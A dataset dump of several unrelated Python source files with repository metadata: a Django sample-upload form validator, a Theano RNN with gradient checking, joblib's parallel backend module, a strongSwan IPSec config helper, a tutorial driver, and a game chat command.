Column('submitting_user', css_class="form-group col-md-3 mb-0"),
Column('submitting_org', css_class="form-group col-md-4 mb-0"),
css_class="form-row",
)
),
Fieldset("Advanced Options",
Row(
Column('secondary_identifier', css_class="form-group col-md-6 mb-0"),
Column('secondary_accession', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
#Row(
# Column('override_heron', css_class="form-group col-md-6 mb-0"),
# css_class="form-row",
#)
),
FormActions(
Submit('save', 'Submit sample'),
css_class="text-right",
)
)
@staticmethod
def modify_preform(data):
LOWERCASE_FIELDS = [
"swab_site",
"sample_type_collected",
"sample_type_received",
]
UPPERCASE_FIELDS = [
]
COERCE_BOOLEAN = [
"is_surveillance",
"is_hcw",
"is_hospital_patient",
"is_care_home_worker",
"is_care_home_resident",
"admitted_with_covid_diagnosis",
"is_icu_patient",
]
for field in LOWERCASE_FIELDS:
if data.get(field):
data[field] = data[field].strip()
if data[field] != "BAL":
data[field] = data[field].strip().lower()
for field in UPPERCASE_FIELDS:
if data.get(field):
data[field] = data[field].strip().upper()
for field in COERCE_BOOLEAN:
if data.get(field):
b = data[field].strip().upper()
if b == "Y" or b == "YES":
data[field] = True
elif b == "N" or b == "NO":
data[field] = False
else:
data[field] = None
#if data.get("swab_site", "").upper() == "NSTS" or data.get("swab_site", "").lower() == "nose and throat":
# data["swab_site"] = "nose-throat"
return data
def clean(self):
cleaned_data = super().clean()
# Check barcode starts with a Heron prefix, unless this has been overridden
#sample_id = cleaned_data.get("central_sample_id")
#if sample_id:
# if cleaned_data["override_heron"] is False:
# valid_sites = [x.code for x in models.Institute.objects.exclude(code__startswith="?")]
# if sum([sample_id.startswith(x) for x in valid_sites]) == 0:
# self.add_error("central_sample_id", "Sample identifier does not match the WSI manifest.")
# Check a received_date was provided for samples without a collection date
if not cleaned_data.get("collection_date") and not cleaned_data.get("received_date"):
self.add_error("received_date", "You must provide a received date for samples without a collection date")
# Check sample date is not in the future
if cleaned_data.get("collection_date"):
if cleaned_data["collection_date"] > timezone.now().date():
self.add_error("collection_date", "Sample cannot be collected in the future")
elif cleaned_data["collection_date"] < (timezone.now().date() - datetime.timedelta(days=365)):
self.add_error("collection_date", "Sample cannot be collected more than a year ago...")
if cleaned_data.get("received_date"):
if cleaned_data["received_date"] > timezone.now().date():
self.add_error("received_date", "Sample cannot be received in the future")
elif cleaned_data["received_date"] < (timezone.now().date() - datetime.timedelta(days=365)):
self.add_error("received_date", "Sample cannot be received more than a year ago...")
# Check if the adm2 looks like a postcode
adm2 = cleaned_data.get("adm2", "")
if len(adm2) > 0 and re.search('\d', adm2):
self.add_error("adm2", "adm2 cannot contain numbers. Use adm2_private if you are trying to provide an outer postcode")
# Check for full postcode mistake
adm2_private = cleaned_data.get("adm2_private")
if " " in adm2_private:
self.add_error("adm2_private", "Enter the first part of the postcode only")
# Validate swab site
swab_site = cleaned_data.get("swab_site")
sample_type = cleaned_data.get("sample_type_collected")
if sample_type and ("swab" not in sample_type and sample_type != "aspirate") and swab_site:
self.add_error("sample_type_collected", "Swab site specified but the sample type is not 'swab'")
#if sample_type == "swab" and not swab_site:
# self.add_error("sample_type_collected", "Sample was a swab but you did not specify the swab site")
# Force is_surveillance
if cleaned_data.get("is_surveillance") is None:
self.add_error("is_surveillance", "You must set is_surveillance to Y or N")
if cleaned_data.get("admission_date") and not cleaned_data.get("is_hospital_patient"):
self.add_error("is_hospital_patient", "Admission date implies patient was admitted to hospital but you've not set is_hospital_patient to Y")
class TestFileForm(forms.Form):
bridge_artifact = forms.ModelChoiceField(queryset=models.MajoraArtifact.objects.all(), required=False, to_field_name="dice_name")
source_artifact = forms.ModelMultipleChoiceField(queryset=models.MajoraArtifact.objects.all(), required=False, to_field_name="dice_name")
source_group = forms.ModelMultipleChoiceField(queryset=models.MajoraArtifactGroup.objects.all(), required=False, to_field_name="dice_name")
publish_group = forms.CharField(max_length=128, required=False)
#pipe_id = forms.UUIDField()
pipe_hook = forms.CharField(max_length=256)
artifact_uuid = forms.UUIDField(required=False)
pipe_kind = forms.CharField(max_length=64)
pipe_name = forms.CharField(max_length=96)
pipe_version = forms.CharField(max_length=48)
#node_uuid = forms.ModelChoiceField(queryset=models.DigitalResourceNode.objects.all())
node_name = forms.ModelChoiceField(queryset=models.DigitalResourceNode.objects.all(), to_field_name="unique_name", required=False)
path = forms.CharField(max_length=1024)
sep = forms.CharField(max_length=2)
current_name = forms.CharField(max_length=512)
current_fext = forms.CharField(max_length=48)
current_hash = forms.CharField(max_length=64)
current_size = forms.IntegerField(min_value=0)
resource_type = forms.ChoiceField(
choices= [
("file", "file"),
("reads", "reads"),
("alignment", "alignment"),
("consensus", "consensus"),
],
)
| [
"[email protected]"
] | |
6066c82429a06cfc912a197d31d676903f1d208e | cd50ed5464a5397b4e5bafc36efebf88f14b2d8b | /models/rnn_theano.py | cd97581f15b5bc82263db599c4e65f8f297ca657 | [] | no_license | millatidy/hit400_lstm | cc6db62c68f18296e40a75395725a8112d4632e8 | 38bce32bd8bec5c20e373957526bfecf79a3a761 | refs/heads/master | 2021-06-18T01:20:17.006138 | 2017-05-09T01:44:24 | 2017-05-09T01:44:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,909 | py | import numpy as np
import theano as theano
import theano.tensor as T
from utils import *
import operator
class RNN_THEANO:
'''
input_dim is the array size of the input data
hidden_dim is the array size of the hidden input_dim
output_dim is the array size of the output
# input weights is array [input_dim,hidden_dim]
# hidden weights is array [hidden_dim, hidden_dim]
# output weights is array [hidden_dim, output_dim]
'''
def __init__(self, input_dim, hidden_dim, output_dim, bptt_truncate=4):
# assign instance variables
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.output_dim = output_dim
self.bptt_truncate = bptt_truncate
# randomly initialize network weights as
input_to_hidden_weights = np.random.uniform(-np.sqrt(1./input_dim), np.sqrt(1./input_dim), (hidden_dim, input_dim))
hidden_to_hidden_weights = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (hidden_dim, hidden_dim))
hidden_to_output_weights = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (output_dim, hidden_dim))
# Theano: Create share variables
self.IH = theano.shared(name='IH', value=input_to_hidden_weights.astype(theano.config.floatX))
self.HH = theano.shared(name='HH', value=hidden_to_hidden_weights.astype(theano.config.floatX))
self.HO = theano.shared(name='HO', value=hidden_to_output_weights.astype(theano.config.floatX))
# We store theano graph = {}
self.theano = {}
self.__theano_build__()
def __theano_build__(self):
IH, HH, HO = self.IH, self.HH, self.HO
x = T.ivector('x')
y = T.ivector('y')
def forward_prop_step(x_t, h_t_prev, IH, HH, HO):
h_t = T.tanh(IH[:,x_t] + HH.dot(h_t_prev))
o_t = T.nnet.softmax(HO.dot(h_t))
return [o_t[0], h_t]
[o,h], updates = theano.scan(
forward_prop_step,
sequences=x,
outputs_info=[None, dict(initial=T.zeros(self.hidden_dim))],
non_sequences=[IH, HH, HO],
truncate_gradient=self.bptt_truncate,
strict=True)
prediction = T.argmax(o, axis=1)
o_error = T.sum(T.nnet.categorical_crossentropy(o,y))
# Gradients
dIH = T.grad(o_error, IH)
dHH = T.grad(o_error, HH)
dHO = T.grad(o_error, HO)
# Assign functions
self.forward_propagation = theano.function([x], o)
self.predict = theano.function([x], prediction)
self.ce_error = theano.function([x,y], o_error)
self.bptt = theano.function([x,y], [dIH, dHH, HO])
# SGD
learning_rate = T.scalar('learning_rate')
self.sdg_step = theano.function([x,y,learning_rate], [],
updates=[(self.IH, self.IH - learning_rate * dIH),
(self.HH, self.HH - learning_rate * dHH),
(self.HO, self.HH - learning_rate * dHO)])
def calculate_total_loss(self, X, Y):
return np.sum([self.ce_error(x,y) for x,y in zip(X,Y)])
def calculate_loss(self, X, Y):
# Divide calculate_loss by the number of words
num_words = np.sum([len(y) for y in Y])
return self.calculate_total_loss(X,Y)/float(num_words)
def gradient_check_theano(model, x, y, h=0.001, error_threshold=0.01):
# Overwrite the bptt attribute. We need to backpropagate all the way to get the correct gradient
model.bptt_truncate = 1000
# Calculate the gradients using backprop
bptt_gradients = model.bptt(x, y)
# List of all parameters we want to chec.
model_parameters = ['U', 'V', 'W']
# Gradient check for each parameter
for pidx, pname in enumerate(model_parameters):
# Get the actual parameter value from the mode, e.g. model.W
parameter_T = operator.attrgetter(pname)(model)
parameter = parameter_T.get_value()
print "Performing gradient check for parameter %s with size %d." % (pname, np.prod(parameter.shape))
# Iterate over each element of the parameter matrix, e.g. (0,0), (0,1), ...
it = np.nditer(parameter, flags=['multi_index'], op_flags=['readwrite'])
while not it.finished:
ix = it.multi_index
# Save the original value so we can reset it later
original_value = parameter[ix]
# Estimate the gradient using (f(x+h) - f(x-h))/(2*h)
parameter[ix] = original_value + h
parameter_T.set_value(parameter)
gradplus = model.calculate_total_loss([x],[y])
parameter[ix] = original_value - h
parameter_T.set_value(parameter)
gradminus = model.calculate_total_loss([x],[y])
estimated_gradient = (gradplus - gradminus)/(2*h)
parameter[ix] = original_value
parameter_T.set_value(parameter)
# The gradient for this parameter calculated using backpropagation
backprop_gradient = bptt_gradients[pidx][ix]
# calculate The relative error: (|x - y|/(|x| + |y|))
relative_error = np.abs(backprop_gradient - estimated_gradient)/(np.abs(backprop_gradient) + np.abs(estimated_gradient))
# If the error is to large fail the gradient check
if relative_error > error_threshold:
print "Gradient Check ERROR: parameter=%s ix=%s" % (pname, ix)
print "+h Loss: %f" % gradplus
print "-h Loss: %f" % gradminus
print "Estimated_gradient: %f" % estimated_gradient
print "Backpropagation gradient: %f" % backprop_gradient
print "Relative Error: %f" % relative_error
return
it.iternext()
print "Gradient check for parameter %s passed." % (pname)
| [
"[email protected]"
] | |
d119951e1a0327b0d9524d4b51562c44cbcf814c | b2c04e31a4eeb4b512512ef6731049fa65f4407c | /presidentspeech/lib/python3.6/site-packages/joblib/_parallel_backends.py | c78750667edb93004442e2a058d88459b9fda75d | [
"MIT"
] | permissive | aless80/Presidentspeech | 805f4da59a9d3e150db752f64f5b9ca0d5b04223 | 39349a4e6fa5a51a181a418bdc85f00878b4c6e4 | refs/heads/master | 2022-11-29T08:52:02.405580 | 2018-10-07T19:45:21 | 2018-10-07T19:45:21 | 102,866,762 | 1 | 0 | MIT | 2022-11-22T03:03:33 | 2017-09-08T13:54:01 | Python | UTF-8 | Python | false | false | 23,014 | py | """
Backends for embarrassingly parallel code.
"""
import gc
import os
import sys
import warnings
import threading
import functools
import contextlib
from abc import ABCMeta, abstractmethod
from .format_stack import format_exc
from .my_exceptions import WorkerInterrupt, TransportableException
from ._multiprocessing_helpers import mp
from ._compat import with_metaclass, PY27
if mp is not None:
from .disk import delete_folder
from .pool import MemmappingPool
from multiprocessing.pool import ThreadPool
from .executor import get_memmapping_executor
# Compat between concurrent.futures and multiprocessing TimeoutError
from multiprocessing import TimeoutError
from .externals.loky._base import TimeoutError as LokyTimeoutError
from .externals.loky import process_executor, cpu_count
class ParallelBackendBase(with_metaclass(ABCMeta)):
"""Helper abc which defines all methods a ParallelBackend must implement"""
supports_timeout = False
nesting_level = 0
def __init__(self, nesting_level=0):
self.nesting_level = nesting_level
SUPPORTED_CLIB_VARS = [
'OMP_NUM_THREADS', 'OPENBLAS_NUM_THREADS', 'MKL_NUM_THREADS',
'VECLIB_MAXIMUM_THREADS', 'NUMEXPR_NUM_THREADS'
]
@abstractmethod
def effective_n_jobs(self, n_jobs):
"""Determine the number of jobs that can actually run in parallel
n_jobs is the number of workers requested by the callers. Passing
n_jobs=-1 means requesting all available workers for instance matching
the number of CPU cores on the worker host(s).
This method should return a guesstimate of the number of workers that
can actually perform work concurrently. The primary use case is to make
it possible for the caller to know in how many chunks to slice the
work.
In general working on larger data chunks is more efficient (less
scheduling overhead and better use of CPU cache prefetching heuristics)
as long as all the workers have enough work to do.
"""
@abstractmethod
def apply_async(self, func, callback=None):
"""Schedule a func to be run"""
def configure(self, n_jobs=1, parallel=None, prefer=None, require=None,
**backend_args):
"""Reconfigure the backend and return the number of workers.
This makes it possible to reuse an existing backend instance for
successive independent calls to Parallel with different parameters.
"""
self.parallel = parallel
return self.effective_n_jobs(n_jobs)
def start_call(self):
"""Call-back method called at the beginning of a Parallel call"""
def stop_call(self):
"""Call-back method called at the end of a Parallel call"""
def terminate(self):
"""Shutdown the workers and free the shared memory."""
def compute_batch_size(self):
"""Determine the optimal batch size"""
return 1
def batch_completed(self, batch_size, duration):
"""Callback indicate how long it took to run a batch"""
def get_exceptions(self):
"""List of exception types to be captured."""
return []
def abort_everything(self, ensure_ready=True):
"""Abort any running tasks
This is called when an exception has been raised when executing a tasks
and all the remaining tasks will be ignored and can therefore be
aborted to spare computation resources.
If ensure_ready is True, the backend should be left in an operating
state as future tasks might be re-submitted via that same backend
instance.
If ensure_ready is False, the implementer of this method can decide
to leave the backend in a closed / terminated state as no new task
are expected to be submitted to this backend.
Setting ensure_ready to False is an optimization that can be leveraged
when aborting tasks via killing processes from a local process pool
managed by the backend it-self: if we expect no new tasks, there is no
point in re-creating new workers.
"""
# Does nothing by default: to be overridden in subclasses when
# canceling tasks is possible.
pass
def get_nested_backend(self):
"""Backend instance to be used by nested Parallel calls.
By default a thread-based backend is used for the first level of
nesting. Beyond, switch to sequential backend to avoid spawning too
many threads on the host.
"""
nesting_level = getattr(self, 'nesting_level', 0) + 1
if nesting_level > 1:
return SequentialBackend(nesting_level=nesting_level)
else:
return ThreadingBackend(nesting_level=nesting_level)
@contextlib.contextmanager
def retrieval_context(self):
"""Context manager to manage an execution context.
Calls to Parallel.retrieve will be made inside this context.
By default, this does nothing. It may be useful for subclasses to
handle nested parallelism. In particular, it may be required to avoid
deadlocks if a backend manages a fixed number of workers, when those
workers may be asked to do nested Parallel calls. Without
'retrieval_context' this could lead to deadlock, as all the workers
managed by the backend may be "busy" waiting for the nested parallel
calls to finish, but the backend has no free workers to execute those
tasks.
"""
yield
@classmethod
def limit_clib_threads(cls, n_threads=1):
"""Initializer to limit the number of threads used by some C-libraries.
This function set the number of threads to `n_threads` for OpenMP, MKL,
Accelerated and OpenBLAS libraries, that can be used with scientific
computing tools like numpy.
"""
for var in cls.SUPPORTED_CLIB_VARS:
var_value = os.environ.get(var, None)
if var_value is None:
os.environ[var] = str(n_threads)
class SequentialBackend(ParallelBackendBase):
"""A ParallelBackend which will execute all batches sequentially.
Does not use/create any threading objects, and hence has minimal
overhead. Used when n_jobs == 1.
"""
uses_threads = True
supports_sharedmem = True
def effective_n_jobs(self, n_jobs):
"""Determine the number of jobs which are going to run in parallel"""
if n_jobs == 0:
raise ValueError('n_jobs == 0 in Parallel has no meaning')
return 1
def apply_async(self, func, callback=None):
"""Schedule a func to be run"""
result = ImmediateResult(func)
if callback:
callback(result)
return result
def get_nested_backend(self):
nested_level = getattr(self, 'nesting_level', 0) + 1
return SequentialBackend(nesting_level=nested_level)
class PoolManagerMixin(object):
"""A helper class for managing pool of workers."""
_pool = None
def effective_n_jobs(self, n_jobs):
"""Determine the number of jobs which are going to run in parallel"""
if n_jobs == 0:
raise ValueError('n_jobs == 0 in Parallel has no meaning')
elif mp is None or n_jobs is None:
# multiprocessing is not available or disabled, fallback
# to sequential mode
return 1
elif n_jobs < 0:
n_jobs = max(cpu_count() + 1 + n_jobs, 1)
return n_jobs
def terminate(self):
"""Shutdown the process or thread pool"""
if self._pool is not None:
self._pool.close()
self._pool.terminate() # terminate does a join()
self._pool = None
def _get_pool(self):
"""Used by apply_async to make it possible to implement lazy init"""
return self._pool
def apply_async(self, func, callback=None):
"""Schedule a func to be run"""
return self._get_pool().apply_async(
SafeFunction(func), callback=callback)
def abort_everything(self, ensure_ready=True):
"""Shutdown the pool and restart a new one with the same parameters"""
self.terminate()
if ensure_ready:
self.configure(n_jobs=self.parallel.n_jobs, parallel=self.parallel,
**self.parallel._backend_args)
class AutoBatchingMixin(object):
"""A helper class for automagically batching jobs."""
# In seconds, should be big enough to hide multiprocessing dispatching
# overhead.
# This settings was found by running benchmarks/bench_auto_batching.py
# with various parameters on various platforms.
MIN_IDEAL_BATCH_DURATION = .2
# Should not be too high to avoid stragglers: long jobs running alone
# on a single worker while other workers have no work to process any more.
MAX_IDEAL_BATCH_DURATION = 2
# Batching counters default values
_DEFAULT_EFFECTIVE_BATCH_SIZE = 1
_DEFAULT_SMOOTHED_BATCH_DURATION = 0.0
def __init__(self):
self._effective_batch_size = self._DEFAULT_EFFECTIVE_BATCH_SIZE
self._smoothed_batch_duration = self._DEFAULT_SMOOTHED_BATCH_DURATION
def compute_batch_size(self):
"""Determine the optimal batch size"""
old_batch_size = self._effective_batch_size
batch_duration = self._smoothed_batch_duration
if (batch_duration > 0 and
batch_duration < self.MIN_IDEAL_BATCH_DURATION):
# The current batch size is too small: the duration of the
# processing of a batch of task is not large enough to hide
# the scheduling overhead.
ideal_batch_size = int(old_batch_size *
self.MIN_IDEAL_BATCH_DURATION /
batch_duration)
# Multiply by two to limit oscilations between min and max.
batch_size = max(2 * ideal_batch_size, 1)
self._effective_batch_size = batch_size
if self.parallel.verbose >= 10:
self.parallel._print(
"Batch computation too fast (%.4fs.) "
"Setting batch_size=%d.", (batch_duration, batch_size))
elif (batch_duration > self.MAX_IDEAL_BATCH_DURATION and
old_batch_size >= 2):
# The current batch size is too big. If we schedule overly long
# running batches some CPUs might wait with nothing left to do
# while a couple of CPUs a left processing a few long running
# batches. Better reduce the batch size a bit to limit the
# likelihood of scheduling such stragglers.
batch_size = old_batch_size // 2
self._effective_batch_size = batch_size
if self.parallel.verbose >= 10:
self.parallel._print(
"Batch computation too slow (%.4fs.) "
"Setting batch_size=%d.", (batch_duration, batch_size))
else:
# No batch size adjustment
batch_size = old_batch_size
if batch_size != old_batch_size:
# Reset estimation of the smoothed mean batch duration: this
# estimate is updated in the multiprocessing apply_async
# CallBack as long as the batch_size is constant. Therefore
# we need to reset the estimate whenever we re-tune the batch
# size.
self._smoothed_batch_duration = \
self._DEFAULT_SMOOTHED_BATCH_DURATION
return batch_size
def batch_completed(self, batch_size, duration):
"""Callback indicate how long it took to run a batch"""
if batch_size == self._effective_batch_size:
# Update the smoothed streaming estimate of the duration of a batch
# from dispatch to completion
old_duration = self._smoothed_batch_duration
if old_duration == self._DEFAULT_SMOOTHED_BATCH_DURATION:
# First record of duration for this batch size after the last
# reset.
new_duration = duration
else:
# Update the exponentially weighted average of the duration of
# batch for the current effective size.
new_duration = 0.8 * old_duration + 0.2 * duration
self._smoothed_batch_duration = new_duration
def reset_batch_stats(self):
"""Reset batch statistics to default values.
This avoids interferences with future jobs.
"""
self._effective_batch_size = self._DEFAULT_EFFECTIVE_BATCH_SIZE
self._smoothed_batch_duration = self._DEFAULT_SMOOTHED_BATCH_DURATION
class ThreadingBackend(PoolManagerMixin, ParallelBackendBase):
"""A ParallelBackend which will use a thread pool to execute batches in.
This is a low-overhead backend but it suffers from the Python Global
Interpreter Lock if the called function relies a lot on Python objects.
Mostly useful when the execution bottleneck is a compiled extension that
explicitly releases the GIL (for instance a Cython loop wrapped in a "with
nogil" block or an expensive call to a library such as NumPy).
The actual thread pool is lazily initialized: the actual thread pool
construction is delayed to the first call to apply_async.
ThreadingBackend is used as the default backend for nested calls.
"""
supports_timeout = True
uses_threads = True
supports_sharedmem = True
def configure(self, n_jobs=1, parallel=None, **backend_args):
"""Build a process or thread pool and return the number of workers"""
n_jobs = self.effective_n_jobs(n_jobs)
if n_jobs == 1:
# Avoid unnecessary overhead and use sequential backend instead.
raise FallbackToBackend(
SequentialBackend(nesting_level=self.nesting_level))
self.parallel = parallel
self._n_jobs = n_jobs
return n_jobs
def _get_pool(self):
"""Lazily initialize the thread pool
The actual pool of worker threads is only initialized at the first
call to apply_async.
"""
if self._pool is None:
self._pool = ThreadPool(self._n_jobs)
return self._pool
class MultiprocessingBackend(PoolManagerMixin, AutoBatchingMixin,
ParallelBackendBase):
"""A ParallelBackend which will use a multiprocessing.Pool.
Will introduce some communication and memory overhead when exchanging
input and output data with the with the worker Python processes.
However, does not suffer from the Python Global Interpreter Lock.
"""
# Environment variables to protect against bad situations when nesting
JOBLIB_SPAWNED_PROCESS = "__JOBLIB_SPAWNED_PARALLEL__"
supports_timeout = True
def effective_n_jobs(self, n_jobs):
"""Determine the number of jobs which are going to run in parallel.
This also checks if we are attempting to create a nested parallel
loop.
"""
if mp is None:
return 1
if mp.current_process().daemon:
# Daemonic processes cannot have children
if n_jobs != 1:
warnings.warn(
'Multiprocessing-backed parallel loops cannot be nested,'
' setting n_jobs=1',
stacklevel=3)
return 1
if process_executor._CURRENT_DEPTH > 0:
# Mixing loky and multiprocessing in nested loop is not supported
if n_jobs != 1:
warnings.warn(
'Multiprocessing-backed parallel loops cannot be nested,'
' below loky, setting n_jobs=1',
stacklevel=3)
return 1
if not isinstance(threading.current_thread(), threading._MainThread):
# Prevent posix fork inside in non-main posix threads
if n_jobs != 1:
warnings.warn(
'Multiprocessing-backed parallel loops cannot be nested'
' below threads, setting n_jobs=1',
stacklevel=3)
return 1
return super(MultiprocessingBackend, self).effective_n_jobs(n_jobs)
def configure(self, n_jobs=1, parallel=None, prefer=None, require=None,
**memmappingpool_args):
"""Build a process or thread pool and return the number of workers"""
n_jobs = self.effective_n_jobs(n_jobs)
if n_jobs == 1:
raise FallbackToBackend(
SequentialBackend(nesting_level=self.nesting_level))
already_forked = int(os.environ.get(self.JOBLIB_SPAWNED_PROCESS, 0))
if already_forked:
raise ImportError(
'[joblib] Attempting to do parallel computing '
'without protecting your import on a system that does '
'not support forking. To use parallel-computing in a '
'script, you must protect your main loop using "if '
"__name__ == '__main__'"
'". Please see the joblib documentation on Parallel '
'for more information')
# Set an environment variable to avoid infinite loops
os.environ[self.JOBLIB_SPAWNED_PROCESS] = '1'
# Make sure to free as much memory as possible before forking
gc.collect()
self._pool = MemmappingPool(
n_jobs, initializer=self.limit_clib_threads, **memmappingpool_args)
self.parallel = parallel
return n_jobs
def terminate(self):
"""Shutdown the process or thread pool"""
super(MultiprocessingBackend, self).terminate()
if self.JOBLIB_SPAWNED_PROCESS in os.environ:
del os.environ[self.JOBLIB_SPAWNED_PROCESS]
self.reset_batch_stats()
class LokyBackend(AutoBatchingMixin, ParallelBackendBase):
"""Managing pool of workers with loky instead of multiprocessing."""
supports_timeout = True
def configure(self, n_jobs=1, parallel=None, prefer=None, require=None,
idle_worker_timeout=300, **memmappingexecutor_args):
"""Build a process executor and return the number of workers"""
n_jobs = self.effective_n_jobs(n_jobs)
if n_jobs == 1:
raise FallbackToBackend(
SequentialBackend(nesting_level=self.nesting_level))
self._workers = get_memmapping_executor(
n_jobs, timeout=idle_worker_timeout,
initializer=self.limit_clib_threads,
**memmappingexecutor_args)
self.parallel = parallel
return n_jobs
def effective_n_jobs(self, n_jobs):
"""Determine the number of jobs which are going to run in parallel"""
if n_jobs == 0:
raise ValueError('n_jobs == 0 in Parallel has no meaning')
elif mp is None or n_jobs is None:
# multiprocessing is not available or disabled, fallback
# to sequential mode
return 1
elif mp.current_process().daemon:
# Daemonic processes cannot have children
if n_jobs != 1:
warnings.warn(
'Loky-backed parallel loops cannot be called in a'
' multiprocessing, setting n_jobs=1',
stacklevel=3)
return 1
elif not isinstance(threading.current_thread(), threading._MainThread):
# Prevent posix fork inside in non-main posix threads
if n_jobs != 1:
warnings.warn(
'Loky-backed parallel loops cannot be nested below '
'threads, setting n_jobs=1',
stacklevel=3)
return 1
elif n_jobs < 0:
n_jobs = max(cpu_count() + 1 + n_jobs, 1)
return n_jobs
def apply_async(self, func, callback=None):
"""Schedule a func to be run"""
future = self._workers.submit(SafeFunction(func))
future.get = functools.partial(self.wrap_future_result, future)
if callback is not None:
future.add_done_callback(callback)
return future
@staticmethod
def wrap_future_result(future, timeout=None):
"""Wrapper for Future.result to implement the same behaviour as
AsyncResults.get from multiprocessing."""
try:
return future.result(timeout=timeout)
except LokyTimeoutError:
raise TimeoutError()
def terminate(self):
if self._workers is not None:
# Terminate does not shutdown the workers as we want to reuse them
# in latter calls but we free as much memory as we can by deleting
# the shared memory
delete_folder(self._workers._temp_folder)
self._workers = None
self.reset_batch_stats()
def abort_everything(self, ensure_ready=True):
"""Shutdown the workers and restart a new one with the same parameters
"""
self._workers.shutdown(kill_workers=True)
delete_folder(self._workers._temp_folder)
self._workers = None
if ensure_ready:
self.configure(n_jobs=self.parallel.n_jobs, parallel=self.parallel)
class ImmediateResult(object):
def __init__(self, batch):
# Don't delay the application, to avoid keeping the input
# arguments in memory
self.results = batch()
def get(self):
return self.results
class SafeFunction(object):
"""Wrapper that handles the serialization of exception tracebacks.
If an exception is triggered when calling the inner function, a copy of
the full traceback is captured to make it possible to serialize
it so that it can be rendered in a different Python process.
"""
def __init__(self, func):
self.func = func
def __call__(self, *args, **kwargs):
try:
return self.func(*args, **kwargs)
except KeyboardInterrupt:
# We capture the KeyboardInterrupt and reraise it as
# something different, as multiprocessing does not
# interrupt processing for a KeyboardInterrupt
raise WorkerInterrupt()
except BaseException:
if PY27:
# Capture the traceback of the worker to make it part of
# the final exception message.
e_type, e_value, e_tb = sys.exc_info()
text = format_exc(e_type, e_value, e_tb, context=10,
tb_offset=1)
raise TransportableException(text, e_type)
else:
# Rely on Python 3 built-in Remote Traceback reporting
raise
class FallbackToBackend(Exception):
"""Raised when configuration should fallback to another backend"""
def __init__(self, backend):
self.backend = backend
| [
"[email protected]"
] | |
f7563abdb8f484051174f08311f015a78de85abb | a01e7f87a0088965e2e0a02476d2df12a49a1a18 | /package/vpntfi/build/lib/vpnmodule/lib/ipsec.py | ec9ef5f7c46a4f3932aa7db489e96b7baad3399c | [] | no_license | gsrr/IFT_jerry | 0456a8a1fb98f84ad5c26dc36bdf32e2d85c750c | 4c2f6900dfd7ae7f6b3cc2150b1c1be236b4c95c | refs/heads/master | 2020-04-04T05:30:10.544252 | 2019-08-22T09:12:03 | 2019-08-22T09:12:03 | 48,145,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | import sys
import os
import configLoader
import mcommon
def make_replace_func(src, dst):
def wrap_func(items):
with open(src, "r") as fr:
with open(dst, "w") as fw:
for line in fr.readlines():
line = line.strip()
for key in items.keys():
if key in line:
line = line.replace(key, items[key])
break
fw.write(line + "\n")
return wrap_func
class IPSec:
def __init__(self, conf = "/etc/strongswan/ipsec.conf"):
self.conf = conf
self.clobj = configLoader.ConfigIPSec(cfg=self.conf + ".default")
self.clobj.load()
def getcfg(self):
print self.clobj.cfg
def _add(self, *paras):
key = paras[0]
value = paras[1]
self.clobj.add(key, value)
def _remove(self, *paras):
key = paras[0]
self.clobj.remove(key)
def status(self):
cmd = "systemctl is-active strongswan"
output = mcommon.call_cmdstr(cmd)[0]
return output
def replacePSK(self, *paras):
src = "/etc/strongswan/ipsec.secrets.default"
dst = "/etc/strongswan/ipsec.secrets"
items = {'[PSK]' : paras[0]}
func = make_replace_func(src, dst)
func(items)
def unload(self):
self.clobj.unload(self.conf)
def showconf(self):
os.system("cat %s"%self.conf)
def decor_test(func):
def wrap_func():
obj = IPSec("/etc/strongswan/ipsec.conf")
obj.getcfg()
obj.unload()
obj.showconf()
return wrap_func
@decor_test
def test_ipsec(obj):
pass
def main():
func=getattr(sys.modules[__name__], sys.argv[1])
func()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
04a5ac227ff16d908d6ea9c43ed65181b56820de | 46b432cd3557038c454601367b878f889c9b6a8f | /kiyuna/tutorial07/tutorial07.py | cd07ce259e448005ecafb1d76d2ccac03e4a9643 | [] | no_license | tmu-nlp/NLPtutorial2019 | 84ceec06568fd9d899a686658fb8851466133375 | d77d199c50cd37d70e462209a7bfcd4dee9140a1 | refs/heads/master | 2020-05-14T13:34:05.336594 | 2019-09-25T02:25:41 | 2019-09-25T02:25:41 | 181,814,723 | 1 | 0 | null | 2019-08-01T18:53:54 | 2019-04-17T04:04:06 | Python | UTF-8 | Python | false | false | 478 | py | from train_nn import *
from test_nn import *
import subprocess
train_path = '../../data/titles-en-train.labeled'
train_nn(train_path, layer_num=1, node_num=2, epoch_num=1, λ=0.1)
test_path = '../../data/titles-en-test.word'
out_path = './out.txt'
test_nn(test_path, out_path)
script_path = '../../script/grade-prediction.py'
ans_path = '../../data/titles-en-test.labeled'
subprocess.run(f'{script_path} {ans_path} {out_path}'.split())
''' RESULT
Accuracy = 92.915338%
'''
| [
"[email protected]"
] | |
54af5cd1a521f7e55d1fc43f8010b47de5507d7a | 67325192c1e528a39d457f11e61b480d68826708 | /mods/mcpython/Commands/paststructur.py | 117c93e349a2e464fbdd360aea9102a06eae33c7 | [
"MIT"
] | permissive | vashistaarav1611/mcpython-a-minecraft-clone-in-python | 5851b377b54fd2b28c106112c7b18f397b71ab50 | c16cd66f319efdeec4130e1a43f5a857caf1ea13 | refs/heads/master | 2023-02-01T22:48:51.787106 | 2020-12-21T15:02:25 | 2020-12-21T15:02:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | # todo: remove
from . import Command
import structures
import globals as G
class paststructur(Command.Command):
@staticmethod
def getHelp():
return "/paststructur <name> <x> <y> <z>"
@staticmethod
def isCommand(line):
return line.split(" ")[0] == "/paststructur"
@staticmethod
def getSyntaxError(line, entity, position, chat): # todo: add systax-system
pass
@staticmethod
def parse(line, entity, position, chat):
sc = line.split(" ")
name = sc[1]
x, y, z = int(sc[2]), int(sc[3]), int(sc[4])
structures.handler.structures[name].past(G.window.model, x, y, z)
Command.handler.register(paststructur)
| [
"[email protected]"
] | |
